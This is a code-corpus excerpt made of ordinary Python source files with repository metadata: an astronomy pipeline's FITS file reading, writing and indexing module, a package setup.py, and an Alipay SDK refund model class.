hdulist = None
# -------------------------------------------------------------------------
# get the number of fits files in filename
try:
n_ext = len(hdulist)
except Exception as e:
WLOG(params, 'warning', TextEntry('10-001-00005', args=[type(e), e]))
n_ext = None
# deal with unknown number of extensions
if n_ext is None:
data, header = deal_with_bad_header(params, hdulist, filename)
# -------------------------------------------------------------------------
# else get the data and header based on how many extnesions there are
else:
dataarr, headerarr = [], []
for it in range(n_ext):
# append header
try:
headerarr.append(hdulist[it].header)
except Exception as e:
if log:
eargs = [os.path.basename(filename), it, type(e), e,
func_name]
WLOG(params, 'error', TextEntry('01-001-00008', args=eargs))
else:
raise e
# append data
try:
if isinstance(hdulist[it].data, fits.BinTableHDU):
dataarr.append(Table.read(hdulist[it].data))
else:
dataarr.append(hdulist[it].data)
except Exception as e:
if log:
eargs = [os.path.basename(filename), it, type(e), e,
func_name]
WLOG(params, 'error', TextEntry('01-001-00007', args=eargs))
else:
raise e
data = list(dataarr)
header = list(headerarr)
# -------------------------------------------------------------------------
# return data and/or header
if getdata and gethdr:
return data, header
elif getdata:
return data
else:
return header
def _read_fitsimage(params, filename, getdata, gethdr, ext=0, log=True):
# -------------------------------------------------------------------------
# deal with getting data
if getdata:
try:
data = fits.getdata(filename, ext=ext)
except Exception as e:
if log:
string_trackback = traceback.format_exc()
emsg = TextEntry('01-001-00014', args=[filename, ext, type(e)])
emsg += '\n\n' + TextEntry(string_trackback)
WLOG(params, 'error', emsg)
data = None
else:
raise e
else:
data = None
# -------------------------------------------------------------------------
# deal with getting header
if gethdr:
try:
header = fits.getheader(filename, ext=ext)
except Exception as e:
if log:
string_trackback = traceback.format_exc()
emsg = TextEntry('01-001-00015', args=[filename, ext, type(e)])
emsg += '\n\n' + TextEntry(string_trackback)
WLOG(params, 'error', emsg)
header = None
else:
raise e
else:
header = None
# -------------------------------------------------------------------------
# return data and header
return data, header
def _read_fitstable(params, filename, getdata, gethdr, ext=0, log=True):
# -------------------------------------------------------------------------
# deal with getting data
if getdata:
try:
data = Table.read(filename, format='fits')
except Exception as e:
if log:
string_trackback = traceback.format_exc()
emsg = TextEntry('01-001-00016', args=[filename, ext, type(e)])
emsg += '\n\n' + TextEntry(string_trackback)
WLOG(params, 'error', emsg)
data = None
else:
raise e
else:
data = None
# -------------------------------------------------------------------------
# deal with getting header
if gethdr:
try:
header = fits.getheader(filename, ext=ext)
except Exception as e:
if log:
string_trackback = traceback.format_exc()
emsg = TextEntry('01-001-00017', args=[filename, ext, type(e)])
emsg += '\n\n' + TextEntry(string_trackback)
WLOG(params, 'error', emsg)
header = None
else:
raise e
else:
header = None
# -------------------------------------------------------------------------
# return data and header
return data, header
# =============================================================================
# Define write functions
# =============================================================================
def writefits(params, filename, data, header, datatype='image', dtype=None,
func=None):
# ------------------------------------------------------------------
# define a synchoronized lock for indexing (so multiple instances do not
# run at the same time)
lockfile = os.path.basename(filename)
# start a lock
lock = drs_lock.Lock(params, lockfile)
# ------------------------------------------------------------------
# make locked read function
@drs_lock.synchronized(lock, params['PID'])
def locked_write():
return _write_fits(params, filename, data, header, datatype, dtype,
func)
# ------------------------------------------------------------------
# try to run locked read function
try:
locked_write()
except KeyboardInterrupt as e:
lock.reset()
raise e
except Exception as e:
# reset lock
lock.reset()
raise e
def _write_fits(params, filename, data, header, datatype='image', dtype=None,
func=None):
# deal with function name coming from somewhere else
if func is None:
func_name = __NAME__ + '.writefits()'
else:
func_name = '{0} (via {1})'.format(func, __NAME__ + '.writefits()')
# ----------------------------------------------------------------------
# check if file exists and remove it if it does
if os.path.exists(filename):
try:
os.remove(filename)
except Exception as e:
eargs = [os.path.basename(filename), type(e), e, func_name]
WLOG(params, 'error', TextEntry('01-001-00003', args=eargs))
# ----------------------------------------------------------------------
# make sure we are dealing with lists of data and headers
if not isinstance(data, list):
data = [data]
if not isinstance(header, list):
header = [header.to_fits_header()]
if not isinstance(datatype, list):
datatype = [datatype]
if dtype is not None and not isinstance(dtype, list):
dtype = [dtype]
# ----------------------------------------------------------------------
# header must be same length as data
if len(data) != len(header):
eargs = [filename, len(data), len(header), func_name]
WLOG(params, 'error', TextEntry('00-013-00004', args=eargs))
# datatype must be same length as data
if len(data) != len(datatype):
eargs = [filename, len(data), len(datatype), func_name]
WLOG(params, 'error', TextEntry('00-013-00005', args=eargs))
# if dtype is not None must be same length as data
if dtype is not None:
if len(data) != len(dtype):
eargs = [filename, len(data), len(dtype), func_name]
WLOG(params, 'error', TextEntry('00-013-00006', args=eargs))
# ----------------------------------------------------------------------
# create the multi HDU list
# try to create primary HDU first
if isinstance(header[0], Header):
header0 = header[0].to_fits_header()
else:
header0 = header[0]
# set up primary HDU (if data[0] == image then put this in the primary)
# else if table then primary HDU should be empty
if datatype[0] == 'image':
hdu0 = fits.PrimaryHDU(data[0], header=header0)
start = 1
else:
hdu0 = fits.PrimaryHDU()
start = 0
if dtype is not None:
hdu0.scale(type=dtype[0], **SCALEARGS)
# add all others afterwards
hdus = [hdu0]
for it in range(start, len(data)):
if datatype[it] == 'image':
fitstype = fits.ImageHDU
elif datatype[it] == 'table':
fitstype = fits.BinTableHDU
else:
continue
# add to hdu list
if isinstance(header[it], Header):
header_it = header[it].to_fits_header()
else:
header_it = header[it]
hdu_i = fitstype(data[it], header=header_it)
if dtype is not None and datatype[it] == 'image':
if dtype[it] is not None:
hdu_i.scale(type=dtype[it])
hdus.append(hdu_i)
# convert to HDU list
hdulist = fits.HDUList(hdus)
# except Exception as e:
# eargs = [type(e), e, func_name]
# WLOG(params, 'error', TextEntry('01-001-00004', args=eargs))
# hdulist = None
# ---------------------------------------------------------------------
# write to file
with warnings.catch_warnings(record=True) as w:
try:
hdulist.writeto(filename, overwrite=True)
except Exception as e:
eargs = [os.path.basename(filename), type(e), e, func_name]
WLOG(params, 'error', TextEntry('01-001-00005', args=eargs))
# ---------------------------------------------------------------------
# ignore truncated comment warning since spirou images have some poorly
# formatted header cards
w1 = []
for warning in w:
# Note: cannot change language as we are looking for python error
# this is in english and shouldn't be changed
wmsg = 'Card is too long, comment will be truncated.'
if wmsg != str(warning.message):
w1.append(warning)
# add warnings to the warning logger and log if we have them
drs_log.warninglogger(params, w1)
def add_header_key(header, keystore, value=None):
# only used if one cannot use DrsFitsFile
hkey, hvalue, hcomment = keystore
# deal with value set
if value is not None:
hvalue = value
# add to header
header[hkey] = (hvalue, hcomment)
# return header
return header
# =============================================================================
# Define search functions
# =============================================================================
def find_files(params, recipe, kind=None, path=None, logic='and', fiber=None,
return_table=False, night=None, **kwargs):
"""
Find files using kwargs (using index files located in 'kind' or 'path')
If path is set will use this path to look for index files
If kind is set to 'raw' uses DRS_DATA_RAW path, if kind is set to 'tmp'
uses DRS_DATA_WORKING path, if kind is set to 'red' uses DRS_DATA_REDUC
else uses params['INPATH']
The logic defines how kwargs are added.
kwargs must be in index file (column names) or in params as header keyword
stores (i.e. KW_DPRTYPE = [HEADER key, HEADER value, HEADER comment]
i.e.
find_files(params, kind='tmp', KW_DPRTYPE='FP_FP')
--> will return all files in the working directory with DPRTYPE = 'FP_FP'
find_files(params, kind='red', KW_DPRTYPE=['OBJ_FP', 'OBJ_DARK'],
KW_OUTPUT='EXT_E2DS')
--> will return all files in reduced directory with:
DPRTYPE = OBJ_FP or OBJ_DARK and DRSOUTID
:param params:
:param kind:
:param path:
:param logic:
:param kwargs:
:return:
"""
func_name = __NAME__ + '.find_files()'
# ----------------------------------------------------------------------
# get pseudo constants
pconst = constants.pload(params['INSTRUMENT'])
# get the index file col name
filecol = params['DRS_INDEX_FILENAME']
nightcol = params['REPROCESS_NIGHTCOL']
timecol = 'KW_MID_OBS_TIME'
# ----------------------------------------------------------------------
# deal with setting path
if path is not None:
path = str(path)
columns = None
index_files = None
index_dir = None
elif kind == 'raw':
# get index table (generate if needed)
indextable, index_dir = find_raw_files(params, recipe)
# construct index file path for raw
raw_index_file = pcheck(params, 'REPROCESS_RAWINDEXFILE',
'raw_index_file', kwargs, func_name)
mpath = os.path.join(params['DRS_DATA_RUN'], raw_index_file)
# set the columns from table
columns = indextable.colnames
# set index files
index_files = [mpath]
elif kind == 'tmp':
path = params['DRS_DATA_WORKING']
columns = pconst.OUTPUT_FILE_HEADER_KEYS()
index_files = None
index_dir = None
elif kind == 'red':
path = params['DRS_DATA_REDUC']
columns = pconst.OUTPUT_FILE_HEADER_KEYS()
index_files = None
index_dir = None
else:
path = params['INPATH']
columns = None
index_files = None
index_dir = None
# ----------------------------------------------------------------------
# deal with making sure all kwargs are in columns (if columns defined)
if columns is not None:
for kwarg in kwargs:
# if dkey not in columns report error
if kwarg not in columns:
# log and raise error
eargs = [kwarg, path, func_name]
WLOG(params, 'error', TextEntry('00-004-00001', args=eargs))
# ----------------------------------------------------------------------
# get index files
if index_files is None:
index_files = get_index_files(params, path, night=night)
# ----------------------------------------------------------------------
# valid files storage
valid_files = []
table_list = []
time_list = []
# filters added string
fstring = ''
# ----------------------------------------------------------------------
# loop through index files
for index_file in index_files:
# read index file
index = drs_table.read_fits_table(params, index_file)
# get directory
if index_dir is None:
dirname = os.path.dirname(index_file)
else:
dirname = index_dir
# ------------------------------------------------------------------
# overall masks
mask = np.ones(len(index), dtype=bool)
# filters added string
fstring = ''
# ------------------------------------------------------------------
# filter via kwargs
for kwarg in kwargs:
# --------------------------------------------------------------
# if dkey is not found in index file then report error
if kwarg not in index.colnames:
# report error
eargs = [kwarg, index_file, func_name]
WLOG(params, 'error', TextEntry('00-004-00002', args=eargs))
# --------------------------------------------------------------
# deal with list of args
if isinstance(kwargs[kwarg], list):
# get new mask
mask0 = np.zeros_like(mask)
# loop around kwargs[kwarg] values (has to be logic==or here)
for value in kwargs[kwarg]:
mask0 |= (index[kwarg] == value.strip())
else:
mask0 = (index[kwarg] == kwargs[kwarg])
# --------------------------------------------------------------
# mask by filter
if logic == 'or':
mask |= mask0
else:
mask &= mask0
# --------------------------------------------------------------
# add to fstring
fstring += '\n\t{0}=\'{1}\''.format(kwarg, kwargs[kwarg])
# ------------------------------------------------------------------
# get files for those that remain
masked_files = index[filecol][mask]
if index_dir is None:
nightnames = np.array(mask).astype(int)
else:
nightnames = index[nightcol][mask]
# ------------------------------------------------------------------
masked_index = index[mask]
# new mask for index files
mask1 = np.zeros(len(masked_files), dtype=bool)
# check that files exist
# loop around masked files
for row, filename in enumerate(masked_files):
# deal with requiring night name
if index_dir is None:
nightname = ''
else:
nightname = nightnames[row]
# --------------------------------------------------------------
# deal with fiber
if fiber is not None:
# two conditions for not having fiber in name
cond1 = '_{0}.'.format(fiber) not in filename
cond2 = '_{0}_'.format(fiber) not in filename
# if both conditions are True then skip
if cond1 and cond2:
continue
# get time value
timeval = float(masked_index[timecol][row])
# construct absolute path
absfilename = os.path.join(dirname, nightname, filename)
# check that file exists
if not os.path.exists(absfilename):
continue
# deal with returning index
mask1[row] = True
# append to storage
if absfilename not in valid_files:
valid_files.append(absfilename)
time_list.append(timeval)
# ------------------------------------------------------------------
# append to table list
if return_table:
table_list.append(masked_index[mask1])
# ----------------------------------------------------------------------
# log found
wargs = [len(valid_files), fstring]
WLOG(params, '', TextEntry('40-004-00004', args=wargs))
# ----------------------------------------------------------------------
# define sort mask (sort by time column)
sortmask = np.argsort(time_list)
# make sure valid_files is a numpy array
valid_files = np.array(valid_files)
# deal with table list
if return_table:
indextable = drs_table.vstack_cols(params, table_list)
return valid_files[sortmask], indextable[sortmask]
else:
# return full list
return valid_files[sortmask]
def get_index_files(params, path=None, required=True, night=None):
"""
Get index files in path (or sub-directory of path)
if path is "None" params['INPATH'] is used
:param params: ParamDict, the parameter dictionary of constants
:param path: str, the path to check for filetypes (must have index files
in this path or sub directories of this path)
if path is "None" params['INPATH'] is used
:param required: bool, if True generates an error when None found
:param night: str or None, if set filters index files by night
:type params: ParamDict
:type path: str
:type required: bool
:type night: str
:return: the absolute paths to all index files under path
:rtype: list[str]
"""
func_name = __NAME__ + '.get_index_files()'
# deal with no path set
if path is None:
path = params['INPATH']
# storage of index files
index_files = []
# walk through path and find index files
for root, dirs, files in os.walk(path, followlinks=True):
# skip nights if required
if night is not None:
if not root.strip(os.sep).endswith(night):
continue
for filename in files:
if filename == params['DRS_INDEX_FILE']:
index_files.append(os.path.join(root, filename))
# log number of index files found
if len(index_files) > 0:
WLOG(params, '', TextEntry('40-004-00003', args=[len(index_files)]))
elif required:
eargs = [path, func_name]
WLOG(params, 'error', TextEntry('01-001-00021', args=eargs))
# return the index files
return np.sort(index_files)
def find_raw_files(params, recipe, **kwargs):
func_name = __NAME__ + '.find_raw_files()'
# get properties from params
night_col = pcheck(params, 'REPROCESS_NIGHTCOL', 'night_col', kwargs,
func_name)
absfile_col = pcheck(params, 'REPROCESS_ABSFILECOL', 'absfile_col',
kwargs,
func_name)
modified_col = pcheck(params, 'REPROCESS_MODIFIEDCOL', 'modified_col',
kwargs, func_name)
sortcol = pcheck(params, 'REPROCESS_SORTCOL_HDRKEY', 'sortcol', kwargs,
func_name)
raw_index_file = pcheck(params, 'REPROCESS_RAWINDEXFILE',
'raw_index_file',
kwargs, func_name)
itable_filecol = pcheck(params, 'DRS_INDEX_FILENAME', 'itable_filecol',
kwargs, func_name)
# get path
path, rpath = _get_path_and_check(params, 'DRS_DATA_RAW')
# print progress
WLOG(params, 'info', TextEntry('40-503-00010'))
# get files
gfout = _get_files(params, recipe, path, rpath)
nightnames, filelist, basenames, mod_times, mkwargs = gfout
# construct a table
mastertable = Table()
mastertable[night_col] = nightnames
mastertable[itable_filecol] = basenames
mastertable[absfile_col] = filelist
mastertable[modified_col] = mod_times
for kwarg in mkwargs:
mastertable[kwarg] = mkwargs[kwarg]
# sort by sortcol
sortmask = np.argsort(mastertable[sortcol])
mastertable = mastertable[sortmask]
# save master table
mpath = os.path.join(params['DRS_DATA_RUN'], raw_index_file)
mastertable.write(mpath, overwrite=True)
# return the file list
return mastertable, rpath
def fix_header(params, recipe, infile=None, header=None,
raise_exception=False, **kwargs):
"""
Instrument specific header fixes are define in pseudo_const.py for an
instrument and called here (function in pseudo_const.py is HEADER_FIXES)
:param params:
:param infile:
:return:
"""
# deal with no header
if header is None:
header = infile.header
hdict = infile.hdict
filename = infile.filename
has_infile = True
else:
has_infile = False
hdict = Header()
filename = None
# load pseudo constants
pconst = constants.pload(params['INSTRUMENT'])
# use pseudo constant to apply any header fixes required (specific to
# a specific instrument) and update the header
try:
header, hdict = pconst.HEADER_FIXES(params=params, recipe=recipe,
header=header, hdict=hdict,
filename=filename,
**kwargs)
except lang.drs_exceptions.DrsHeaderError as e:
if raise_exception:
raise e
else:
eargs = [e.key, e.filename]
WLOG(params, 'error', TextEntry('01-001-00027', args=eargs))
# if the input was an infile return the infile back
if has_infile:
# return the updated infile
infile.header = header
infile.hdict = hdict
return infile
# else return the header (assuming input was a header only)
else:
# else return the header
return header, hdict
# =============================================================================
# Define other functions
# =============================================================================
def combine(params, recipe, infiles, math='average', same_type=True):
"""
Takes a list of infiles and combines them (infiles must be DrsFitsFiles)
combines using the math given.
Allowed math:
'sum', 'add', '+'
'average', 'mean'
'subtract', '-'
'divide', '/'
'multiply', 'times', '*'
Note 'infiles' must be all the same DrsFitsFile type to combine by default,
use 'same_type=False' to override this option
Note the header is copied from infiles[0]
:param params: ParamDict, parameter dictionary of constants
:param infiles: list of DrsFiles, list of DrsFitsFiles to combine
:param math: str, the math allowed (see above)
:param same_type: bool, if True all infiles must have the same DrsFitFile
dtype
:type params: ParamDict
:type infiles: list[DrsFitsFile]
:type math: str
:type same_type: bool
:return: Returns the combined DrsFitFile (header same as infiles[0])
:rtype: DrsFitsFile
"""
func_name = __NAME__ + '.combine()'
# if we have a string assume we have 1 file and skip combine
if type(infiles) is str:
return infiles
# make sure infiles is a list
if type(infiles) is not list:
WLOG(params, 'error', TextEntry('00-001-00020', args=[func_name]))
# if we have only one file (or none) skip combine
if len(infiles) == 1:
return infiles[0]
elif len(infiles) == 0:
return infiles
# check that all infiles are the same DrsFileType
if same_type:
for it, infile in enumerate(infiles):
if infile.name != infiles[0].name:
eargs = [infiles[0].name, it, infile.name, func_name]
WLOG(params, 'error', TextEntry('00-001-00021', args=eargs))
# get output path from params
outpath = str(params['OUTPATH'])
# check if outpath is set
if outpath is None:
WLOG(params, 'error', TextEntry('01-001-00023', args=[func_name]))
return None
# get the absolute path (for combined output)
if params['NIGHTNAME'] is None:
outdirectory = ''
else:
outdirectory = params['NIGHTNAME']
# combine outpath and out directory
abspath = os.path.join(outpath, outdirectory)
# make new infile using math
outfile = infiles[0].combine(infiles[1:], math, same_type, path=abspath)
# update the number of files
outfile.numfiles = len(infiles)
# write to disk
WLOG(params, '', TextEntry('40-001-00025', args=[outfile.filename]))
outfile.write_file()
# add to output files (for indexing)
recipe.add_output_file(outfile)
# return combined infile
return outfile
def get_mid_obs_time(params, header, out_fmt=None, **kwargs):
func_name = __NAME__ + '.get_mid_obs_time()'
# get obs_time
outkey = params['KW_MID_OBS_TIME'][0]
# get format from params
timefmt = params.instances['KW_MID_OBS_TIME'].datatype
# get data type from params
timetype = params.instances['KW_MID_OBS_TIME'].dataformat
# get raw value from header
rawtime = header[outkey]
# get time object
obstime = Time(timetype(rawtime), format=timefmt)
# set the method for getting mid obs time
method = 'header'
dbname = 'header_time'
# return time in requested format
if out_fmt is None:
return obstime, method
elif out_fmt == 'mjd':
return float(obstime.mjd), method
elif out_fmt == 'jd':
return float(obstime.jd), method
elif out_fmt == 'iso' or out_fmt == 'human':
return obstime.iso, method
elif out_fmt == 'unix':
return float(obstime.unix), method
elif out_fmt == 'decimalyear':
return float(obstime.decimalyear), method
else:
kinds = ['None', 'human', 'iso', 'unix', 'mjd', 'jd', 'decimalyear']
eargs = [dbname, ' or '.join(kinds), out_fmt, func_name]
WLOG(params, 'error', TextEntry('00-001-00030', args=eargs))
# =============================================================================
# Worker functions
# =============================================================================
def deal_with_bad_header(p, hdu, filename):
"""
Deal with bad headers by iterating through good hdu's until we hit a
problem
:param p: ParamDict, the constants file
:param hdu: astropy.io.fits HDU
:param filename: string - the filename for logging
:return data:
:return header:
"""
# define condition to pass
cond = True
# define iterator
it = 0
# define storage
datastore = []
headerstore = []
# loop through HDU's until we cannot open them
while cond:
# noinspection PyBroadException
try:
datastore.append(hdu[it].data)
headerstore.append(hdu[it].header)
except Exception as _:
cond = False
# iterate
it += 1
# print message
if len(datastore) > 0:
dargs = [it - 1, filename]
WLOG(p, 'warning', TextEntry('10-001-00001', args=dargs))
# find the first one that contains equal shaped array
valid = []
for d_it in range(len(datastore)):
if hasattr(datastore[d_it], 'shape'):
valid.append(d_it)
# if valid is empty we have a problem
if len(valid) == 0:
WLOG(p, 'error', TextEntry('01-001-00001', args=[filename]))
# return valid data
return datastore, headerstore
def check_dtype_for_header(value):
# if value is a string check if it is a path if it is remove path
# and leave base file
if isinstance(value, str):
if os.path.isfile(value):
newvalue = os.path.basename(value)
elif os.path.isdir(value):
newvalue = os.path.dirname(value)
else:
newvalue = str(value)
# if value is a bool then we need to true it to a int (1 or 0)
elif isinstance(value, bool):
if value:
newvalue = 1
else:
newvalue = 0
# if value is a float need to check for NaN
elif isinstance(value, float):
if np.isnan(value):
newvalue = 'NaN'
else:
newvalue = float(value)
# if value is a int do nothing
elif isinstance(value, int):
newvalue = int(value)
# else convert to string to be safe
else:
newvalue = str(value)
# return new value
return newvalue
def _get_path_and_check(params, key):
# check key in params
if key not in params:
WLOG(params, 'error', '{0} not found in params'.format(key))
# get top level path to search
rpath = params[key]
# deal with not having nightname
if 'NIGHTNAME' not in params:
path = str(rpath)
elif params['NIGHTNAME'] not in ['', 'None', None]:
path = os.path.join(rpath, params['NIGHTNAME'])
else:
path = str(rpath)
# check if path exists
if not os.path.exists(path):
WLOG(params, 'error', 'Path {0} does not exist'.format(path))
else:
return path, rpath
def _get_files(params, recipe, path, rpath, **kwargs):
func_name = __NAME__ + '.get_files()'
# get properties from params
absfile_col = pcheck(params, 'REPROCESS_ABSFILECOL', 'absfile_col', kwargs,
func_name)
modified_col = pcheck(params, 'REPROCESS_MODIFIEDCOL', 'modified_col',
kwargs, func_name)
raw_index_file = pcheck(params, 'REPROCESS_RAWINDEXFILE', 'raw_index_file',
kwargs, func_name)
# get the file filter (should be None unless we want specific files)
filefilter = params.get('FILENAME', None)
if filefilter is not None:
filefilter = list(params['FILENAME'])
# ----------------------------------------------------------------------
# get the pseudo constant object
pconst = constants.pload(params['INSTRUMENT'])
# ----------------------------------------------------------------------
# get header keys
headerkeys = pconst.OUTPUT_FILE_HEADER_KEYS()
# get raw valid files
raw_valid = pconst.VALID_RAW_FILES()
# ----------------------------------------------------------------------
# storage list
filelist, basenames, nightnames, mod_times = [], [], [], []
blist = []
# load raw index
rawindexfile = os.path.join(params['DRS_DATA_RUN'], raw_index_file)
if os.path.exists(rawindexfile):
rawindex = drs_table.read_table(params, rawindexfile, fmt='fits')
else:
rawindex = None
# ----------------------------------------------------------------------
# populate the storage dictionary
kwargs = dict()
for key in headerkeys:
kwargs[key] = []
# ----------------------------------------------------------------------
# deal with white/black list for nights
wnightnames = None
if 'WNIGHTNAMES' in params:
if not drs_text.null_text(params['WNIGHTNAMES'], ['None', 'All', '']):
wnightnames = params.listp('WNIGHTNAMES', dtype=str)
bnightnames = None
if 'BNIGHTNAMES' in params:
if not drs_text.null_text(params['BNIGHTNAMES'], ['None', 'All', '']):
bnightnames = params.listp('BNIGHTNAMES', dtype=str)
# ----------------------------------------------------------------------
# get files (walk through path)
for root, dirs, files in os.walk(path, followlinks=True):
# loop around files in this root directory
for filename in files:
# --------------------------------------------------------------
if filefilter is not None:
if os.path.basename(filename) not in filefilter:
continue
# --------------------------------------------------------------
# get night name
ucpath = drs_path.get_uncommon_path(rpath, root)
if ucpath is None:
eargs = [path, rpath, func_name]
WLOG(params, 'error', TextEntry('00-503-00003', args=eargs))
# --------------------------------------------------------------
# make sure file is valid
isvalid = False
for suffix in raw_valid:
if filename.endswith(suffix):
isvalid = True
# --------------------------------------------------------------
# do not scan empty ucpath
if len(ucpath) == 0:
continue
# --------------------------------------------------------------
# deal with blacklist/whitelist
if not drs_text.null_text(bnightnames, ['None', 'All', '']):
if ucpath in bnightnames:
# only print path if not already in blist
if ucpath not in blist:
# log blacklisted
margs = [ucpath]
WLOG(params, '', TextEntry('40-503-00031', args=margs))
# add to blist for printouts
blist.append(ucpath)
# skip this night
continue
if not drs_text.null_text(wnightnames, ['None', 'All', '']):
if ucpath not in wnightnames:
# skip this night
continue
# elif we haven't seen this night before log statement
elif ucpath not in nightnames:
# log: whitelisted
margs = [ucpath]
WLOG(params, '', TextEntry('40-503-00030', args=margs))
# --------------------------------------------------------------
# log the night directory
if (ucpath not in nightnames) and (ucpath != rpath):
# log: scnannming directory
margs = [ucpath]
WLOG(params, '', TextEntry('40-503-00003', args=margs))
# --------------------------------------------------------------
# get absolute path
abspath = os.path.join(root, filename)
modified = os.path.getmtime(abspath)
# --------------------------------------------------------------
# if not valid skip
if not isvalid:
continue
# --------------------------------------------------------------
# else append to list
else:
nightnames.append(ucpath)
filelist.append(abspath)
basenames.append(filename)
mod_times.append(modified)
# --------------------------------------------------------------
# see if file in raw index and has correct modified date
if rawindex is not None:
# find file
rowmask = (rawindex[absfile_col] == abspath)
# find match date
rowmask &= modified == rawindex[modified_col]
# only continue if both conditions found
if np.sum(rowmask) > 0:
# locate file
row = np.where(rowmask)[0][0]
# if both conditions met load from raw fits file
for key in headerkeys:
kwargs[key].append(rawindex[key][row])
# file was found
rfound = True
else:
rfound = False
else:
rfound = False
# --------------------------------------------------------------
# deal with header
if filename.endswith('.fits') and not rfound:
# read the header
header = read_header(params, abspath)
# fix the headers
try:
header, _ = fix_header(params, recipe, header=header,
raise_exception=True)
except lang.drs_exceptions.DrsHeaderError as e:
# log warning message
eargs = [e.key, abspath]
emsg = TextEntry('10-001-00008', args=eargs)
WLOG(params, 'warning', emsg)
# remove from lists
nightnames.pop()
filelist.pop()
basenames.pop()
mod_times.pop()
# continue to next file
continue
# loop around header keys
for key in headerkeys:
rkey = params[key][0]
if rkey in header:
kwargs[key].append(header[rkey])
else:
kwargs[key].append('')
# ----------------------------------------------------------------------
# sort by filename
sortmask = np.argsort(filelist)
filelist = np.array(filelist)[sortmask]
nightnames = np.array(nightnames)[sortmask]
basenames = np.array(basenames)[sortmask]
mod_times = np.array(mod_times)[sortmask]
# need to sort kwargs
for key in kwargs:
kwargs[key] = np.array(kwargs[key])[sortmask]
# ----------------------------------------------------------------------
# return filelist
return nightnames, filelist, basenames, mod_times, kwargs
# =============================================================================
# Start of code
# =============================================================================
# Main code here
if __name__ == "__main__":
# ----------------------------------------------------------------------
# print 'Hello World!'
print("Hello World!")
# =============================================================================
# End of code
# =============================================================================
| 39.057063
| 80
| 0.501488
|
5ead94b33f93390f8069c8f48a75a9bd6f91e800
| 653
|
py
|
Python
|
safegraph_patterns/setup.py
|
jingjtang/covidcast-indicators
|
34cb8786f78fbea2710b810a9500ee02c2379241
|
[
"MIT"
] | 8
|
2020-10-12T04:27:04.000Z
|
2022-03-08T16:56:57.000Z
|
safegraph_patterns/setup.py
|
jingjtang/covidcast-indicators
|
34cb8786f78fbea2710b810a9500ee02c2379241
|
[
"MIT"
] | 666
|
2020-09-30T21:18:41.000Z
|
2022-03-31T22:37:12.000Z
|
safegraph_patterns/setup.py
|
jingjtang/covidcast-indicators
|
34cb8786f78fbea2710b810a9500ee02c2379241
|
[
"MIT"
] | 13
|
2020-10-01T14:25:06.000Z
|
2022-02-12T08:31:19.000Z
|
from setuptools import setup
from setuptools import find_packages
required = [
"numpy",
"pandas",
"pydocstyle",
"pytest",
"pytest-cov",
"pylint==2.8.3",
"delphi-utils"
]
setup(
name="delphi_safegraph_patterns",
version="0.0.1",
description="Mobility Indicators from Safegraph",
author="",
author_email="",
url="https://github.com/cmu-delphi/covidcast-indicators",
install_requires=required,
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"Programming Language :: Python :: 3.8",
],
packages=find_packages(),
)
| 22.517241
| 61
| 0.633997
|
b1f56d45f082bad798a71fb82ae7323ba9c190d5
| 3,361
|
py
|
Python
|
alipay/aop/api/domain/MybankPaymentTradeBusinessOrderRefundModel.py
|
antopen/alipay-sdk-python-all
|
8e51c54409b9452f8d46c7bb10eea7c8f7e8d30c
|
[
"Apache-2.0"
] | 213
|
2018-08-27T16:49:32.000Z
|
2021-12-29T04:34:12.000Z
|
alipay/aop/api/domain/MybankPaymentTradeBusinessOrderRefundModel.py
|
antopen/alipay-sdk-python-all
|
8e51c54409b9452f8d46c7bb10eea7c8f7e8d30c
|
[
"Apache-2.0"
] | 29
|
2018-09-29T06:43:00.000Z
|
2021-09-02T03:27:32.000Z
|
alipay/aop/api/domain/MybankPaymentTradeBusinessOrderRefundModel.py
|
antopen/alipay-sdk-python-all
|
8e51c54409b9452f8d46c7bb10eea7c8f7e8d30c
|
[
"Apache-2.0"
] | 59
|
2018-08-27T16:59:26.000Z
|
2022-03-25T10:08:15.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class MybankPaymentTradeBusinessOrderRefundModel(object):
def __init__(self):
self._amount = None
self._currency_value = None
self._order_no = None
self._refund_type = None
self._remark = None
self._request_no = None
@property
def amount(self):
return self._amount
@amount.setter
def amount(self, value):
self._amount = value
@property
def currency_value(self):
return self._currency_value
@currency_value.setter
def currency_value(self, value):
self._currency_value = value
@property
def order_no(self):
return self._order_no
@order_no.setter
def order_no(self, value):
self._order_no = value
@property
def refund_type(self):
return self._refund_type
@refund_type.setter
def refund_type(self, value):
self._refund_type = value
@property
def remark(self):
return self._remark
@remark.setter
def remark(self, value):
self._remark = value
@property
def request_no(self):
return self._request_no
@request_no.setter
def request_no(self, value):
self._request_no = value
def to_alipay_dict(self):
params = dict()
if self.amount:
if hasattr(self.amount, 'to_alipay_dict'):
params['amount'] = self.amount.to_alipay_dict()
else:
params['amount'] = self.amount
if self.currency_value:
if hasattr(self.currency_value, 'to_alipay_dict'):
params['currency_value'] = self.currency_value.to_alipay_dict()
else:
params['currency_value'] = self.currency_value
if self.order_no:
if hasattr(self.order_no, 'to_alipay_dict'):
params['order_no'] = self.order_no.to_alipay_dict()
else:
params['order_no'] = self.order_no
if self.refund_type:
if hasattr(self.refund_type, 'to_alipay_dict'):
params['refund_type'] = self.refund_type.to_alipay_dict()
else:
params['refund_type'] = self.refund_type
if self.remark:
if hasattr(self.remark, 'to_alipay_dict'):
params['remark'] = self.remark.to_alipay_dict()
else:
params['remark'] = self.remark
if self.request_no:
if hasattr(self.request_no, 'to_alipay_dict'):
params['request_no'] = self.request_no.to_alipay_dict()
else:
params['request_no'] = self.request_no
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = MybankPaymentTradeBusinessOrderRefundModel()
if 'amount' in d:
o.amount = d['amount']
if 'currency_value' in d:
o.currency_value = d['currency_value']
if 'order_no' in d:
o.order_no = d['order_no']
if 'refund_type' in d:
o.refund_type = d['refund_type']
if 'remark' in d:
o.remark = d['remark']
if 'request_no' in d:
o.request_no = d['request_no']
return o
| 28.974138
| 79
| 0.582862
|
c825b56c321bc8bd7e630b81e7c10f965b7616af
| 3,675
|
py
|
Python
|
localshop/apps/packages/utils.py
|
CheeseTheMonkey/localshop
|
d597eb07b20e20e2c4f9f5416b131c48638f0ab3
|
[
"BSD-3-Clause"
] | null | null | null |
localshop/apps/packages/utils.py
|
CheeseTheMonkey/localshop
|
d597eb07b20e20e2c4f9f5416b131c48638f0ab3
|
[
"BSD-3-Clause"
] | null | null | null |
localshop/apps/packages/utils.py
|
CheeseTheMonkey/localshop
|
d597eb07b20e20e2c4f9f5416b131c48638f0ab3
|
[
